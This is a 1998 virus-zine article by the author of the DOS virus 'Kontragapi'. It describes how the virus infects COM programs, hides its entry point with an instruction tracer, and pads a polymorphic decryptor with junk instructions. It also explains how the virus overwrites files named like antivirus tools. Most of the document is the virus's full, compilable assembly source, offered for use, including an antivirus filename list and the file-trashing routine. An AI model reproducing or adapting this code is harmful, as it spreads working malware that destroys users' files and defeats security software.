Copy Link
Add to Bookmark
Report
Hexfiles Issue 3 File 012
HEX-FILES No. 3 File 012
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Virus Name: Kontragapi
Author: Putoksa Kawayan
Origin: Manila, Philippines
Date Written: April 1998
Kontragapi is a polymorphic, memory resident, COM infector. It places
the "jump to virus" away from the entry point. It generates random
common instructions to pad the decryption instructions. It would also
trash programs it consider as anti-virus.
Even with heuristic, AVs could not detect the virus at present. Even
if the AV could find the "jump to virus", it would get lost in the
padding used to hide the decryption instructions. Even AVs that
construct or use a generic decryptor, would find it hard to determine
the specific decryption instructions.
These would remain true until the AVs get hold of the virus.
THE VIRUS
Kontragapi resides in memory as a TSR requiring 6432 bytes of memory.
It hooks Int 21. It also hooks Int 24 when the Int 21 handler is
active. It lets other infected files know that it is resident in
memory. If it receives a get system date request (21/2a) with DX
having a value of 1898h, DX is returned with a value of 1998h. There
is no chance that this value would be returned by the regular
function because it is out of range.
It infects COM programs if you want to know what drive you are
currently on (21/0e) or you ask for the system date (21/2a). This
usually happens when you execute a "DIR". Even typing "A:" and
pressing the enter key triggers the infection routine.
Because the infection triggers are not directly associated with a
file, Kontragapi searches for an uninfected COM program in the
current directory.
How does it know if the COM is infected? Kontragapi looks at the time
and date stamp value for the file returned by the file search. If the
FileTime.Second and FileDate.Day-1 is the same, then the file is
considered infected. I used FileDate.Day-1 so that I could lessen the
chance of triggering the "invalid time stamp" flag of AVs' heuristic
scanners. This leaves me with files created on the 31st day of the
month that would trigger the heuristic flag, like MS-DOS 6.22 COMs.
Kontragapi would only infect COM programs at least 512 bytes long.
However, having a longer file is no guarantee that it would be
infected. This would depend on the location of the executable
instructions and what these instructions are. If a COM is infected,
the virus is appended to the program. The instruction that passes
control to the virus is usually somewhere in the middle of the host
program.
The virus is 2292 bytes long but the actual infective length varies.
This is because the length of the decryptor varies between 100 and
1000 bytes. I reserved a 1536-byte buffer for the creation of the
decryptor to be safe.
RETROVIRUS (ANTI-AV) FUNCTIONS
Kontragapi would check name of files against those normally used by
AVs, that is, when you execute them (21/4b); when you open a file
(21/3d); tinker with their attributes (21/43); or, rename them
(21/56). The filename associated with these DOS functions is
considered AV if it matches any of the following:
F-* TB* AV* *AV *VIR* *SCAN* *KILL*
If a match is found, the start of the file would be overwritten with
a short program that randomly displays "kontragapi".
Kontragapi is not selective on file types and would even overwrite
text files. The file extension is included in the AV name match.
Infected programs renamed by AVs to *.VIR would also be overwritten.
These AV search masks would take care of all the AVs referenced
(except for Sweep which is a later addition) in the PhVx Register. As
promised last issue, AVP had been included in the guest list of
Kontragapi. AVP is very close to my heart that I would go out of my
way to accomodate it.
POLYMORPHISM
You can consider the encryption of Kontragapi as polymorphic.
However, it is not a true polymorphic because the decryption
structure remains constant. What makes this polymorphic is the
insertion of random common instructions in between the decryption
instructions.
The structure of the decryption is as follows:
mov sp,start_virus
_loop: pop ax
xchg sp,ax
xor/sub/add sp,ax
xchg sp,ax
push ax
pop reg16 (except sp)
cmp sp,end_decryption
The encryption loop has two format:
jne _loop je _end
jmp virus_code jmp _loop
_end: jmp virus_code
Notice that only two registers are used in the decryption -- sp and
ax. This simplifies the insertion of irrelevant common instructions.
And, ah and sp, as well as al and ax, share the same register bit
value.
What are the instructions inserted? All instructions inserted are
common and what could be more common than:
mov reg,reg/mem/immediate
add/adc/sub/sbb/xor/or/and/cmp reg,reg/mem/immediate
rol/ror/rcl/rcr/shl/shr/sar reg,cl/1
xchg ax,reg16
The register and immediate operands could either be 8-bit or 16-bit.
All registers are used except for sp. The memory operands are in four
formats: directly addressed, and, indirect with no displacement, with
8-bit diplacement and 16-bit displacement.
The instructions generated are based on the content of the file which
would make the insertions "unique" to that file. There would be at
least one inserted instruction (1 to 5 bytes long) in-between the
decryption instructions. The first decryption instruction would be
placed away from the destination of the "jump to virus".
Is this routine bug-free? I admit that I have not thoroughly debugged
the routine. One problem I forsee is when it comes to memory
operands. If we have the instruction:
mov/add/adc/sub/sbb/xor/or/and/cmp register16,[memory16]
and [memory16] points to ffffh, then we would be facing hang time. It
had happened before and it could happen again. That's the risk we
have to take.
This usually happens if the instruction associated with a 16-bit
indirect-addressed memory operand is preceded by an OR PtrReg16,xxxx.
Although MOV, ADD, ADC, SUB, SBB, XOR and AND could also precipitate
this problem, it would not be as likely as OR. Because the program
loops, the value of that PtrReg16 could accumulate especially if it
is not changed by other instructions within the loop.
INSTRUCTION TRACER
Kontragapi uses an instruction tracer to "tunnel" into the host
program. This would put the "jump to virus" several instructions away
from the program entry point, the first non-branching instruction,
that is not a jmp or call.
The tracer does not care what the instructions are. However, it is
interested in how many bytes make up the instruction. By doing this,
it could skip over some instructions. In the real world, this would
be 3 to 6 instructions because the tracer fails when it gets to a
conditional jump. Still, there would be instances when this would be
much farther away.
The instructions recognized by Kontragapi and therefore skipped are:
int 10/11/12/16/1a/some 21
push/pop segreg/reg16
inc/dec reg16
add/adc/sub/sbb/xor/or/and/cmp reg/mem, mem/reg/immediate
mov reg/mem, mem/reg/immediate
mov segreg, reg/mem
mov reg/mem, segreg
lea reg, mem
test ax/al, immediate
rol/ror/rcl/rcr/shl/shr/sar reg/mem, cl/1
xchg ax, reg16
cs:/ds:/es:/ss:
pusha/popa/pushf/popf
cbw/cwd/nop
daa/das/aaa
cmc/clc/cli/sti/cld/std
direct jmp_short/jmp_near/call_near
This would be fine if there are no risks involved. What are these?
* It is possible that the virus could be changed/overwritten because
we are not concerned with what the skipped instructions really
are. Any instruction that changes the content of a memory operand
is a possible cause for disaster.
* Because we re-execute the skipped instructions, if the host
program assumes the register to contains a particular value, then
we have a problem here.
* If the skipped instructions change the value of a segment
register, this might result to unfavorable condition.
<o>
Two debug scripts follows the source code. The first is the virus as
compiled from the source code below. The other is the virus that was
released as beta version.
ÄÄ KNTRAGAP.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ HEX-FILES No 3 ÄÄÄ
;ÄÄÄÄÄ Virus Name: Kontragapi ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Author : Putoksa Kawayan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Origin : Manila, Philippines ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Date : April 1998 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ COMPILING ÄÄÄÄÄÄÄÄÄÄÄÄ Can be compiled in A86 4.02, TASM 2.01 ÄÄ
;ÄÄÄÄÄ INSTRUCTION ÄÄÄÄÄÄÄÄÄÄÄÄ and MASM 5.0 ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Compile to EXE. ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ WARNING! This program could make your AV useless. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
.286
kontragapi segment para 'code'
assume cs:kontragapi,ds:kontragapi
dta struc
ForDos db ?
ReservedForDos db 20 dup (?)
FileAttribute db ?
FileTime dw ?
FileDate dw ?
FileLengthLow dw ?
FileLengthHigh dw ?
FileName db 2 dup (?)
FileNameMM db 6 dup (?)
ExtCommand db 4 dup (?)
EndDta db ?
dta ends
mystack struc
LastMoveAx dw ?
ComLength dw ?
PointerLow dw ?
BranchedFlag db ?
InfectStatus db ?
EndOfStruc dw ?
mystack ends
EncryptCount equ (((offset VirusDta)-offset ThisIsKontragapi)/2)-1
MemoryRequired equ ((offset FirstGeneration-offset ThisIsKontragapi)+100h)/16
OneByteOpCodLen equ (offset OneByteOpCodeEnd-offset OneByteOpCode)
Environment equ 2ch
Timer equ 46ch
org 0
ThisIsKontragapi:
call ShoMess
db 13,10
ThisVirusIs db 'kontragapi'
db 13,10,'$',26
ShoMess:xor ax,ax
mov ds,ax
mov al,ds:Timer
and al,1
jz NoShow
pop dx
push cs
pop ds
mov ah,9
int 21h
NoShow: mov ah,4ch
int 21h
MessPopLen equ $-ThisIsKontragapi
Decryptor:
mov sp,1898 ; encryption start
pop ax
xchg sp,ax
Decrypt:xor sp,ax
xchg sp,ax
push ax
EndDcrp:cmp sp,1998 ; encryption end
GetSetErrInt:
pop di
mov ax,3524h
call UseDos
push es
push bx
mov ah,25h
mov dx,offset isErr
push ax
call UseDos
push cs
pop es
jmp di
SaveDta:pop di
mov ah,2fh
call UseDos
push es
push bx
push cs
pop ds
jmp di
MessPopDropper:
pusha
push ds
push es
push ds
pop es
cmp al,6ch
je Drop01
mov si,dx
Drop01: mov bp,ds
call SaveDta
call GetSetErrInt
call SetDta
mov dx,si
mov ds,bp
call FindFirstFile
jc Drop07
push cs
pop ds
push dx
call InfectCheck
je Drop06
mov di,30 ;Dta.FileName
add di,si
mov bx,di
mov si,offset BannedList ; AV file name mask
lodsw
cmp [di],ax ;F-*
je Drop11
lodsw
cmp [di],ax ;TB*
je Drop11
mov ax,[si]
cmp [di],ax ;AV*
je Drop11
mov ax,'.' ; find dot extension separator
Drop02: inc di
cmp [di],al ; is it a dot?
je Drop03
cmp [di],ah ; end of filename?
jne Drop02
Drop03: lodsw
cmp [di-2],ax ;*AV
je Drop11
xor cx,cx
Drop04: mov di,bx ;*VIR* *SCAN* *KILL*
lodsb
or al,al ; end of AV mask?
jz Drop06
mov cl,al ; it's a char count
lodsb
Drop05: scasb ; do we have a match?
je Drop08
cmp [di],ch ; end of filename?
jne Drop05
dec cx
add si,cx ; get next AV mask
jmp Drop04
Drop06: pop ax
Drop07: jmp short Drop12
Drop08: push ax
push cx
push si
push di
Drop09: dec cx ; we've got a match
jz Drop10 ; kill them AVs
lodsb
scasb
je Drop09
pop di
pop si
pop cx
pop ax
jmp Drop05
Drop10: add sp,8
Drop11: pop dx
mov ds,bp
call ClearAttribute
jc Drop12 ; its write protected
call OpenFile
jc Drop12
push cs
pop ds
xor dx,dx ;offset ThisIsKontragapi
mov cx,MessPopLen
call WriteSetTimeDate ; trash the AV
call CloseFile
Drop12: pop ax
pop dx
pop ds
call UseDos
pop dx
pop ds
call Set2Dta
pop es
pop ds
popa
jmp short Dos01
isDos: pushf ; int 21 handler
push ax
mov al,ah
;--------------------------------------
;---------------------------- infect
;--------------------------------------
cmp al,19h ; get current drive
je Dos09
;--------------------------------------
;------------------- mem resident check
;--------------------------------------
cmp al,2ah ; get system date
je Dos06
;--------------------------------------
;---------------------------- trash av
;--------------------------------------
cmp al,3dh ; open file
je Dos08
cmp al,43h ; file attribute
je Dos08
cmp al,56h ; rename file
je Dos08
cmp al,4bh ; execute
je Dos08
Dos01: pop ax
Dos02: mov word ptr cs:Dos05+1,ax
jmp short Dos03
Dos06: cmp dx,1898h ; its this centennial thingy!!!!
jne Dos09
inc dh
pop ax
popf
isErr: mov al,0 ; int 24 handler
iret
Dos07: pushf
jmp Dos02
Dos03: mov ax,1998h ; dos segment
push ax
Dos04: mov ax,1898h ; dos offset
push ax
Dos05: mov ax,'RP' ; dos function
iret ;<-------------- execute old dos!
Dos08: jmp MessPopDropper
Dos09: pusha
push ds
push es
call SaveDta
push cs
pop es
mov ax,sp
sub ax,EndOfStruc ; set data area
mov bp,ax
xchg ax,sp
push ax ; save sp
xor dl,dl
mov InfectStatus[bp],dl
mov ah,36h ; get free disk space
call UseDos
mul bx
mul cx
or dx,dx
jnz Dos10
cmp ax,((offset VirusDta-offset ThisIsKontragapi)+(512*3))
jb Dos18
Dos10: call SetDta
Dos11: call FindFirstCom
jc Dos18
Dos12: call InfectCheck
jz Dos17
mov ax,word ptr FileName[si] ; check for command.com
cmp word ptr ExtCommand[si],ax ; do not infect!
jnz Dos13
mov ax,word ptr FileNameMM[si]
cmp al,ah
jz Dos17
Dos13: mov ax,FileLengthLow[si] ; check file length
mov ComLength[bp],ax
cmp ax,-((offset VirusDta-offset ThisIsKontragapi)+(512*3))
jnb Dos17
call GetSetErrInt
lea dx,FileName[si]
call ClearAttribute
jc Dos16 ; write protected?
call OpenFile
jc Dos15
call Masker ; trace and encrypt = infect
Dos14: call CloseFile
lea dx,FileName[si]
Dos15: xor ch,ch
mov cl,FileAttribute[si]
call SetAttribute ; restore file attribute
Dos16: pop ax
pop dx
pop ds
call UseDos ; restore int 24
push cs
pop ds
mov al,0 ; if not 0 find another com
xchg InfectStatus[bp],al
or al,al
jz Dos18
Dos17: call FindNext
jnc Dos12
Dos18: pop ax ; retrieve sp...
mov sp,ax ; ...and restore
pop dx
pop ds
call Set2Dta ; restore dta
pop es
pop ds
popa ; restore registers
jmp Dos01
EncryptOpCode db 1, 29h,31h, 3, 2bh,33h
;add-sub-xor-add-sub-xor
Masker: xor ax,ax
mov BranchedFlag[bp],al
mov PointerLow[bp],ax
mov LastMoveAx[bp],ax
mov word ptr ds:Init2+1,ax
dec ax
dec ax
mov word ptr ds:Init+1,ax
call ReadFile
cmp ax,cx ; read what we asked for?
jne Trax1 ; if no, file too small
cmp word ptr ds:ReadBuffer,'ZM' ; renamed exe?
je Trax1
call Tracer
jnc Trax3
Trax1: mov InfectStatus[bp],100 ; set for another search
Trax2: stc
ret
Trax3: mov ax,si
sub ax,offset ReadBuffer
cmp BranchedFlag[bp],0 ; is file entry through a branch?
jne Trax4
cmp ax,8
jbe Trax1
Trax4: add ax,PointerLow[bp]
mov word ptr ds:Init3+1,ax
xchg dx,ax
call MovePointer
xchg ax,cx
mov dx,si
mov di,offset SavedHost ; save overwritten host
movsw
movsb
mov di,dx
mov al,0e9h ; jump to virus
stosb
mov ax,ComLength[bp]
mov si,ax
inc ah
mov word ptr ds:Init1+1,ax
mov word ptr ds:Decryptor+1,ax
push ax
xchg ax,si
sub ax,cx
add ax,offset VirusDta-5 ; jump displacement
stosw
mov cx,3
call WriteFile ; write jump to virus
;-------------------------------- Encrypt
pop dx
mov di,offset EncryptOpCode
xor si,si
mov ds,si
Encry01:mov ax,ds:Timer ; get random value for
and al,7 ; Encryption opcode
cmp al,5 ; we need a value from 0 to 5
jbe Encry02
mov al,ah
and al,7
cmp al,5
ja Encry01
Encry02:cbw
push cs
pop ds
add di,ax
xchg cx,ax
mov al,[di]
cmp cl,2
jbe Encry03
mov ah,0e0h
jmp short Encry04
Encry03:mov ah,0c4h
Encry04:mov word ptr ds:Decrypt,ax ; set decryptor
cmp cl,3
jnb Encry05
add di,3
Encry05:cmp cl,5 ; xor 33
je Encry09
cmp cl,2 ; xor 31
je Encry08
cmp cl,3 ; add 3
je Encry06
or cl,cl ; add 1
jnz Encry07 ; then it must be sub 29/2b
Encry06:inc di
jmp short Encry08
Encry07:dec di
Encry08:mov al,[di]
Encry09:mov byte ptr ds:Encry11,al ; set encryption opcode
jmp $+2 ;<--------------- we need to put brakes here.
mov ax,dx ; Encry07 to Encry11 is a clear run
mov di,offset EncryptBuffer ; we might not have the correct
mov cx,EncryptCount ; encryption opcode on the first
add ax,cx ; loop if we would not empty
add ax,cx ; the prefetch
mov word ptr ds:EndDcrp+2,ax
push bp
push di
push dx
mov bp,2
Encry10:add dx,bp ; encrypt while copying virus code
lodsw
Encry11:xor ax,dx
stosw
dec cx
jnz Encry10
pop dx
dec dh
call MovePointer ; set pointer to end of host
;---------------------CreateDecryptor
mov si,offset decryptor
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; bp is used as ax_safe_to_use flag
;
; bp = 0 --> ax is safe to use
; bp = 1 --> do not use ax
; bp = -1 --> do not use flag reg setting instructions, ax is safe to use
; but ignored
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
xor bp,bp
push di
mov dx,di
call CreatePad ; do it twice to put our decryptor as far
call CreatePad ; away from the jmp destination
movsb
movsw ; mov sp,xxxx
Decryp1:call CreatePad
mov ax,di
sub ax,dx
cmp ax,50 ; at least 50 bytes away from entry?
jb Decryp1
and ax,-2 ; force even number
add word ptr ds:EndDcrp+2,ax
push di
movsb ; pop ax
inc bp
call CreatePad
movsb ; xchg sp,ax
call CreatePad
movsw ; add/sub/xor sp,ax
call CreatePad
movsb ; xchg sp,ax
call CreatePad
movsb ; push ax
dec bp
call CreatePad
mov al,[di] ; set for pop xx
and al,7
cmp al,4 ; is it sp?
jne Decryp2
inc ax
Decryp2:or al,58h
stosb ; pop reg16 (except sp)
call CreatePad
movsw ; cmp sp,xxxx
movsw
dec bp
call CreatePad
inc bp
pop cx
push cx
mov ax,di
sub ax,cx
or ah,ah
jnz Decryp3
cmp al,80h-3 ; is it a short jump?
ja Decryp3
add al,2
neg al
mov ah,al
mov al,75h ;then use jnz xxxx to pop ax
stosw
call CreatePad
pop ax
jmp short Decryp5
Decryp3:mov si,di
scasw ; skip this one for a while
call CreatePad
mov al,0e9h
stosb
pop dx ; use je xxxx to jmp -> pop ax
mov ax,di
sub ax,dx
inc ax
inc ax
neg ax
stosw
mov dx,di ; save this offset just in case the
call CreatePad ; conditional jump is not short
mov ax,di
sub ax,si
cmp al,81 ; is jump short?
jbe Decryp4
mov ax,dx ; i am dead meat if this is not
sub ax,si ; going to be a short jump
pop cx
push di
sub al,2
mov ah,al
mov al,74h ; je xxxx
mov [si],ax
mov di,dx
mov al,0e9h
stosb ; jmp to Init1
mov ax,di
sub ax,cx
add ax,((offset VirusDta)-Offset Init)
neg ax
stosw
pop di
jmp short Decryp6
Decryp4:sub al,2
mov ah,al
mov al,74h
mov [si],ax
Decryp5:mov al,0e9h
stosb ; jmp to Init1
pop cx
mov ax,di
sub ax,cx
add ax,((offset VirusDta)-Offset Init)
neg ax
stosw
Decryp6:call CreatePad ; make more closing pad
call CreatePad
pop dx
pop bp
mov cx,di
sub cx,dx
WriteSetTimeDate:
call WriteFile
mov si,offset VirusDta
mov dx,FileDate[si] ; restore file time/date stamp
mov cx,FileTime[si]
mov ax,5701h
jmp short UseDos
ClearAttribute:
xor cx,cx
SetAttribute:
mov ax,4301h
jmp short UseDos
SetDta: mov dx,offset VirusDta
Set2Dta:mov ah,1ah
UseDos: pushf
push cs
call Dos07
ret
WriteFile:
mov ah,40h
jmp UseDos
CloseFile:
mov ah,3eh
jmp UseDos
FindFirstCom:
mov dx,offset ComFiles
FindFirstFile:
mov cx,27h
mov ah,4eh
jmp UseDos
FindNext:
mov ah,4fh
jmp UseDos
ReadFile:
mov ah,3fh
mov cx,512
mov dx,offset ReadBuffer
jmp UseDos
MovePointer:
xor cx,cx
mov ax,4200h
jmp UseDos
InfectCheck:
mov si,offset VirusDta
mov dl,byte ptr FileDate[si]
mov al,byte ptr FileTime[si]
mov cl,al
mov dh,1fh ; infect check:
and dl,dh ; FileDate.Day-1 = FileTime.Second
and cl,dh
dec dx
cmp cl,dl
je Infect2Check
and al,0e0h
or al,dl
mov byte ptr FileTime[si],al ; set infection id
inc dx
Infect2Check:
ret
OpenFile:
mov ax,3d02h
call UseDos
mov bx,ax
ret
BannedList db 'F-' ; I think you all know
db 'TB' ; what these are -- names
db 'AV' ; of programs I am fond of.
db 3,'VIR' ; This would take care of all
db 4,'SCAN' ; programs referenced in
db 4,'KILL',0 ; phvx register
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;
; TRACER reads host program instruction so that the jump to virus
; code is placed some bites away from the host program entry point
; (first instruction that is not a branch). In most cases, TRACER
; would be able to place the jump to virus after four or six
; instructions away from the entry point. But there would be cases
; where this would be placed much farther.
;
; Most AVs that use the entry point to scan for viruses would not
; be able to detect the viruses. For those that would be able to
; detect the virus we need encryption to hide our virus.
;
; The only danger in using TRACER is that a possibility exists that
; the virus would be corrupted during the execution of the skipped
; host program codes. Although this is unlikely to happen, still
; the possibilty of it happening is is there.
;
; Another side effect is in programs that displays a message at
; the start of the program. In that case, the messages would be
; displayed twice which would give away the presence of the virus.
;
; The instructions skipped by TRACER are:
;
; Instructions Operands
;
; INT 10/11/12/16/1a/some 21
; PUSH/POP segreg/reg16
; INC/DEC reg16
; ADD/ADC/SUB/SBB/XOR/OR/AND/CMP reg/mem,mem/reg/immediate
; MOV reg/mem,mem/reg/immediate
; MOV segreg,reg/mem + reg/mem,segreg
; LEA reg,mem
; TEST ax/al,immediate
; ROL/ROR/RCL/RCR/SHL/SHR/SAR reg/mem,cl/1
; XCHG ax,reg16
; CS:/DS:/ES:/SS:
; PUSHA/POPA/PUSHF/POPF
; CBW/CWD/NOP
; DAA/DAS/AAA
; CMC/CLC/CLI/STI/CLD/STD
; DIRECT JMPshort/JMPnear/CALLnear
;
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tracer: mov si,dx
add dx,ax
dec dx
dec dx
mov ax,[si]
cmp al,0ebh ; short jump
jne Trace01
mov al,ah
cbw
jmp short Trace03
_who_am_i db 'Putoksa Kawayan'
Trace01:cmp al,0e9h ; near jump
je Trace02
cmp al,0e8h ; call
jne Trace14
sub word ptr ds:Init+1,2 ; set sp for return
Trace02:mov ax,[si+1] ; get displacement
inc ax
Trace03:inc ax
inc ax
jz Trace04 ; infInite loop?
mov dx,PointerLow[bp]
add dx,ax
call MovePointer
mov PointerLow[bp],ax
mov word ptr ds:Init2+1,ax
call ReadFile
jc Trace05
mov BranchedFlag[bp],ch
cmp ax,cx ; did we get what we asked for?
je Tracer
Trace04:stc
Trace05:ret
Trace06:add ax,si
mov si,ax
sub ax,offset ReadBuffer
jc Trace07 ; backward jump
cmp si,dx
jb Trace08 ; are we still in buffer?
Trace07:mov dx,PointerLow[bp]
add dx,ax
call MovePointer
mov PointerLow[bp],ax
mov LastMoveAx[bp],cx
call ReadFile
jc Trace05
or ax,ax
jz Trace04
mov si,dx
add dx,ax
dec dx ; set upper limit for buffer
dec dx
Trace08:mov ax,[si]
cmp al,0ebh ; short jump
jne Trace10
mov al,ah
Trace09:cbw
jmp short Trace12
Trace10:cmp al,0e9h ; near jump
je Trace11
cmp al,0e8h ; call
jne Trace14
Trace11:mov ax,[si+1] ; get displacement
inc ax
Trace12:inc ax
Trace13:inc ax
jz Trace04 ; no end loop?
jmp Trace06
Trace14:mov di,offset OneByteOpCode
mov cx,OneByteOpCodLen
repne scasb
jne Trace16
Trace15:mov ax,1
jmp Trace06
Trace16:cmp al,3dh ;*** opcodes 0 - 3d other than 1 byte opcodes
ja Trace21 ; add/adc/sub/sbb/and/or/xor/cmp mem/reg,reg/mem
cmp al,0fh ;*** pop cs in 8086, something else in 386
je Trace05 ; we will skip this one
push ax
and al,0ch ; is it ax/al, immediate?
cmp al,0ch
je Trace17
cmp al,4 ; is it ax/al, immediate?
Trace17:pop ax
jne Trace20
Trace18:and al,1 ; 8-bit or 16-bit?
jz Trace09
Trace19:mov ax,3
jmp Trace06
Trace20:call CheckOperandCount
jmp Trace06
Trace21:cmp al,40h ;** inc/dec ax/cx/dx/bx/sp/bp/si/di
jb Trace28 ;* push/pop ax/cx/dx/bx/sp/bp/si/di
cmp al,61h ;** pusha/popa
jbe Trace15
cmp al,80h ;**
jb Trace28 ;* add/adc/sub/sbb/and/or/xor/cmp mem/reg,immediate
cmp al,83h ;**
ja Trace23
Trace22:push ax
call CheckOperandCount
pop cx
and cx,3
dec cx
jz Trace12
jmp Trace13
Trace23:cmp al,88h ;** mov reg/mem,reg/mem lea reg,mem
jb Trace28 ;* mov segreg,reg/mem
cmp al,8eh ;** mov reg/mem,segreg
jbe Trace20
cmp al,90h ;** nop
jb Trace28 ;* xchg ax,ax/cx/dx/bx/sp/bp/si/di
cmp al,99h ;** cbw/cwd
jbe Trace15
cmp al,0a0h ;** mov ax/al,direct_addressed_mem
jb Trace28 ;* mov direct_addressed_mem,ax/al
cmp al,0a3h ;**
jbe Trace19
cmp al,0a8h ;**
jb Trace28 ;* test ax/al,immediate
cmp al,0a9h ;**
jbe Trace18
cmp al,0b0h ;**
jb Trace28 ;* mov reg,immediate
cmp al,0bfh ;**
ja Trace26
cmp al,0b4h ;
je Trace24 ; save for cd 21 check
cmp al,0b8h ;
jne Trace25
Trace24:mov LastMoveAx[bp],si
Trace25:and al,8
jnz Trace19
jmp Trace09
Trace26:test ah,38h ; reg bits = 0 ?
jnz Trace27
cmp al,0c6h ;**
jb Trace28 ;* mov reg/mem,immediate
cmp al,0c7h ;**
jbe Trace22
Trace27:cmp al,0cdh ;** int xx
je Trace29
cmp al,0d0h ;**
jb Trace28 ;* rol/ror/rcl/rcr/shl/shr/sar reg/mem,cl/1
cmp al,0d3h ;**
jbe Trace20
Trace28:clc
ret
Trace29:mov al,ah ;**** int checks ****
cmp al,10h ;-- video
je Trace33
cmp al,11h ;-- hardware
je Trace33
cmp al,12h ;-- memory
je Trace33
cmp al,16h ;-- keyboard
je Trace33
cmp al,1ah ;-- real time clock
je Trace33
cmp al,20h ;-- terminate
je Trace31
cmp al,27h ;-- tsr
je Trace31
cmp al,21h ;-- dos
jne Trace28
mov di,LastMoveAx[bp]
or di,di ; is it in read buffer?
jz Trace28 ; no! then we stop here
mov al,[di]
mov cx,si
sub cx,di
cmp cx,15 ; is it within 15 bytes?
ja Trace28 ; no! then stop here
cmp al,0b4h ; is it mov ah,xx?
je Trace30
inc di ; then it is mov ax,xxxx
Trace30:inc di
mov al,[di] ;*** get function call
cmp al,4ch ;-- terminate
je Trace31
cmp al,31h ;-- tsr
je Trace31
cmp al,9 ;-- print string
je Trace32
cmp al,0eh ;-- change drive
je Trace32
cmp al,0fh ;-- open file
je Trace32
cmp al,16h ;-- create file
je Trace32
cmp al,1ah ;-- set dta
je Trace32
cmp al,25h ;-- set int vector
je Trace32
cmp al,2eh ;-- set verify flag
je Trace32
cmp al,33h ;-- set ctrl brk
je Trace32
cmp al,3bh ;-- create directory
je Trace32
cmp al,3ch ;-- create file
je Trace32
cmp al,3dh ;-- open file
je Trace32
cmp al,43h ;-- set attribute
je Trace32
cmp al,48h ;-- modify memory
je Trace32
cmp al,6ch ;-- open/create
je Trace32
or al,al ;-- terminate
jne Trace33 ; none of the above! we will skip it.
Trace31:stc
Trace32:ret
Trace33:mov ax,2 ; skip 2-byte int call
jmp Trace06
OneByteOpCode db 6,7,0eh,16h,17h,1eh,1fh,26h,27h,2eh,2fh,36h,37h
db 3eh,9ch,9dh,0f5h,0f8h,0f9h,0fah,0fbh,0fch,0fdh
OneByteOpCodeEnd:
